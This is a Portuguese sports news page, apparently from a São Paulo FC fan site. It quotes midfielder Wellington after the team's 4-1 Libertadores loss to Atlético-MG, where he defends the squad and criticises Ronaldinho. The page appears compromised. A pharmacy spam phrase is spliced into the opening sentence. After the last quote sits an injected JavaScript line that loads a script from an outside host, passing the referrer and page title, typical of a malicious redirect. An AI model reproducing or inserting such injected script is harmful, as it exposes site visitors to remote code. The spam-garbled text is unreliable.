Sem categoria

Wellington elogia São Paulo e alfineta Ronaldinho: ‘É fácil fazer graça quando está ganhando’


O volante Wellington abandonou o discurso comedido durante Cialis for Sale in Ca… o desembarque do elenco do São Paulo, nesta quinta-feira (09), após a eliminação da Taça Libertadores da América. O jogador “colocou a cara à tapa” e elogiou a disposição da equipe são-paulina durante a derrota por 4 a 1 para o Atlético/MG, ocorrida na noite da última quarta-feira.

“É levantar a cabeça, ninguém gosta de perder, ainda da forma que foi. Eu sou um cara que não foge da responsabilidade, não fujo, não sou moleque, sou homem. Assumo qualquer tipo de responsabilidade, mas o grupo está de parabéns, lutamos, tentamos, mas não conseguimos a vitória”, disse o volante.

Encarregado da marcação de Ronaldinho Gaúcho, Wellington alfinetou o meia atleticano. Para o volante são-paulino, Ronaldinho só “fez graça” com a bola depois do primeiro gol e, com o apoio da torcida, acabou desequilibrando o confronto. No entanto, Wellington ressaltou que “é fácil fazer graça quando o time dele está ganhando”.

“Enquanto estava 1 a 0, foi um duelo de igual para igual. Depois que fizeram o segundo e o terceiro, tivemos de sair para o jogo para tentar o gol, buscar o resultado e ele (Ronaldinho), um jogador habilidoso, quis fazer graça, estava junto da torcida, aí desequilibra. Aí vocês (jornalistas) acham que o Wellington não marcou, que ninguém correu, que ninguém presta mais, mas o futebol é assim. Eu acho que ele jogou o futebol dele, só que é fácil fazer graça quando o time dele está ganhando”, alfinetou o volante.

Na última semana, o São Paulo foi eliminado do Campeonato Paulista e, agora, também está fora da Libertadores. Wellington, no entanto, demonstrou otimismo quanto à recuperação da equipe:

“A gente vai dar a volta por cima. E hoje, os que xingam, falam que não valemos nada, que pisam na gente, vão ser os que vão aplaudir no outro dia”, finalizou.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sem categoria

Mais em Sem categoria

São Paulo quer evitar “gols bobos” para aliviar pressão sobre defesa

saopauloadmin5 de março de 2017

Chapecoense

saopauloadmin29 de novembro de 2016

Membros de organizada depõem sobre invasão ao CT do São Paulo

saopauloadmin30 de agosto de 2016

Neto: “Pato se apresenta semana que vem ao São Paulo”

saopauloadmin22 de julho de 2016

De folga na arquibancada, campeão do mundo vibra com o São Paulo

saopauloadmin6 de abril de 2016

São Paulo empata com o River Plate pela Libertadores e está vivo

saopauloadmin11 de março de 2016

Algoz de rival na base assina primeiro contrato com o São Paulo

saopauloadmin27 de janeiro de 2016

Monstro na área!

saopauloadmin21 de janeiro de 2016

Lugano veste “manto sagrado” e diz que volta é retribuição ao São Paulo

saopauloadmin18 de janeiro de 2016